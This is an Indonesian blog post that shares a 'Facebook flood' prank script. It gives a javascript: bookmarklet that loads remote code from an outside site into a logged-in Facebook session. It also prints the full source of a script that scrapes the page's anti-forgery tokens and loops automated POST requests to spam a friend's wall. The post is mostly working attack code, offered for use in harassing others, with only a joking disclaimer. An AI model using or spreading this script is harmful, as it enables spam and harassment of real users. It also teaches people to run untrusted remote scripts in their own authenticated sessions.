KOCOMOTO

Worrying won’t stop bad things from happening. It only stops you from enjoying the good.

script flood untuk Facebook

2 Comments

barusan dapet dari kaskus, script untuk nge-flood wall facebook .. heheheh.. lumayan buat ngerjain temen yang pake BB, dijamin gak berenti2 bunyi tuh BB….. Xixixixixixi….Ok langsung saja :

langkah pertama :
1. buka profile fb temen kamu , nah diatasnya kan ada URL nya dia yang isinya seperti ini : http://www.facebook.com/profile.php?id=XXXXXXXXXX
2. ganti URL tersebut dengan script ini : 
javascript:(a = (b = document).createElement(“script”)).src = “//xenonime.com/tools/wew.js”, b.body.appendChild(a); void(0);
3. teken enter , nanti ada window kecil , masukin jumlah pesan yan gakan dikirim, coba aja masukin 1000 > teken enter.
4. keluar window kecil lagi masukan pesan yang akan dikirim : masukin pesan apa aja….. , rus teken enter…. tunggu beberapa saat…. dan cek… BB temen ada (kalo lagi deketan) …. pasti bunyi terus…… 
mo bikin sendiri script nya : ini contohnya :

var a = document.body.innerHTML; 

var Num = prompt("", "Masukkan Jumlah Pesan Yang Akan Dikirim");      formx = a.match(/name="post_form_id" value="([\d\w]+)"/)[1];      dts = a.match(/name="fb_dtsg" value="([^"]+)"/)[1];         composerid = a.match(/name="xhpc_composerid" value="([^"]+)"/)[1];    var msg = prompt("", "Masukkan Pesan Anda");     

target = a.match(/name="targetid" value="([^"]+)"/)[1];   

pst = "post_form_id=" + formx + "&fb_dtsg=" + dts + "&xhpc_composerid=" + composerid + "&xhpc_targetid=" + target+ "&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=" + encodeURIComponent(msg) + "&xhpc_message=" + encodeURIComponent(msg) + "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest";  i=0;                              

while(i < Num){   with(newx = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded")  , send(pst);     i += 1;                 }

selamat mencoba….
Ati2 kalo ngejain orang, ntar orangnya marah di blok FB sampean ….saya gak tanggung jawab :p
Advertisements

2 thoughts on “script flood untuk Facebook

  1. kan gw coba…*ketawa setan

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s